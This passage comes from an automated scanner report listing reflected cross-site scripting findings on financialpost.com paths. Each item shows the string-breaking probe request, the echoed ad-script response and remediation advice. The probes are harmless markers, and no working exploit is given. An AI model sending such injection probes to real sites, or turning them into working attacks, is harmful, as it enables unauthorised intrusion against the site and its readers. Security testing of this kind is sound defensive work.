P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37381


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news9749c';ea6b87ad49c/legal/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news9749c';ea6b87ad49c;kw=legal;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87926628?">
...[SNIP]...

1.192. http://www.financialpost.com/news/legal/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/legal/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de7ae'%3bad722b91cc3 was submitted in the REST URL parameter 2. This input was echoed as de7ae';ad722b91cc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/legalde7ae'%3bad722b91cc3/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43189


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/legalde7ae';ad722b91cc3/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=legalde7ae';ad722b91cc3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=64094012?">
...[SNIP]...

1.193. http://www.financialpost.com/news/marketing/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/marketing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b9fe'%3beb1408074c9 was submitted in the REST URL parameter 1. This input was echoed as 3b9fe';eb1408074c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news3b9fe'%3beb1408074c9/marketing/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43306


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news3b9fe';eb1408074c9/marketing/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news3b9fe';eb1408074c9;kw=marketing;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=20978426?">
...[SNIP]...

1.194. http://www.financialpost.com/news/marketing/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/marketing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28044'%3bc70d3668348 was submitted in the REST URL parameter 2. This input was echoed as 28044';c70d3668348 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/marketing28044'%3bc70d3668348/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43269


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/marketing28044';c70d3668348/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=marketing28044';c70d3668348;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=79147008?">
...[SNIP]...

1.195. http://www.financialpost.com/news/mining/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/mining/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d492c'%3b18622a2ecd was submitted in the REST URL parameter 1. This input was echoed as d492c';18622a2ecd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /newsd492c'%3b18622a2ecd/mining/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36406


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/newsd492c';18622a2ecd/mining/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=newsd492c';18622a2ecd;kw=mining;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=95276488?">
...[SNIP]...

1.196. http://www.financialpost.com/news/mining/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/mining/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 287dd'%3beeb5abe1ff2 was submitted in the REST URL parameter 2. This input was echoed as 287dd';eeb5abe1ff2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/mining287dd'%3beeb5abe1ff2/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43209


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/mining287dd';eeb5abe1ff2/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=mining287dd';eeb5abe1ff2;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33158550?">
...[SNIP]...

1.197. http://www.financialpost.com/news/technology/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/technology/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d5c4'%3b688bdb9d235 was submitted in the REST URL parameter 1. This input was echoed as 4d5c4';688bdb9d235 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news4d5c4'%3b688bdb9d235/technology/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43326


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news4d5c4';688bdb9d235/technology/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news4d5c4';688bdb9d235;kw=technology;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=10817757?">
...[SNIP]...

1.198. http://www.financialpost.com/news/technology/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /news/technology/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 278b5'%3b89821bbfc44 was submitted in the REST URL parameter 2. This input was echoed as 278b5';89821bbfc44 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology278b5'%3b89821bbfc44/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:10:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43289


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/news/technology278b5';89821bbfc44/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=news;kw=technology278b5';89821bbfc44;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=44991912?">
...[SNIP]...

1.199. http://www.financialpost.com/opinion/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63693'%3b5121090781a was submitted in the REST URL parameter 1. This input was echoed as 63693';5121090781a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion63693'%3b5121090781a/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43940


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion63693';5121090781a/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion63693';5121090781a;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=22167228?">
...[SNIP]...

1.200. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/breaking-views/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd052'%3b65c989df336 was submitted in the REST URL parameter 1. This input was echoed as bd052';65c989df336 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionbd052'%3b65c989df336/breaking-views/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37628


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionbd052';65c989df336/breaking-views/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionbd052';65c989df336;kw=breaking-views;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=14176007?">
...[SNIP]...

1.201. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/breaking-views/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85a05'%3b5e640f9eda1 was submitted in the REST URL parameter 2. This input was echoed as 85a05';5e640f9eda1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/breaking-views85a05'%3b5e640f9eda1/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44256


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/breaking-views85a05';5e640f9eda1/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=breaking-views85a05';5e640f9eda1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=41116950?">
...[SNIP]...

1.202. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1998'%3bdad09d492bc was submitted in the REST URL parameter 1. This input was echoed as b1998';dad09d492bc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionb1998'%3bdad09d492bc/columnists/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37548


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionb1998';dad09d492bc/columnists/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionb1998';dad09d492bc;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=96826146?">
...[SNIP]...

1.203. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7773e'%3bee2319eb393 was submitted in the REST URL parameter 2. This input was echoed as 7773e';ee2319eb393 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinion/columnists7773e'%3bee2319eb393/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44176


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists7773e';ee2319eb393/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists7773e';ee2319eb393;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=58999813?">
...[SNIP]...

1.204. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f06c4'%3ba01e7d2f0a9 was submitted in the REST URL parameter 1. This input was echoed as f06c4';a01e7d2f0a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /opinionf06c4'%3ba01e7d2f0a9/columnists/Diabetes+RDSP+confusion/3996673/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78746
Expires: Sun, 19 Dec 2010 03:13:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:13:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinionf06c4';a01e7d2f0a9/columnists/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinionf06c4';a01e7d2f0a9;kw=columnists;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=94765539?">
...[SNIP]...

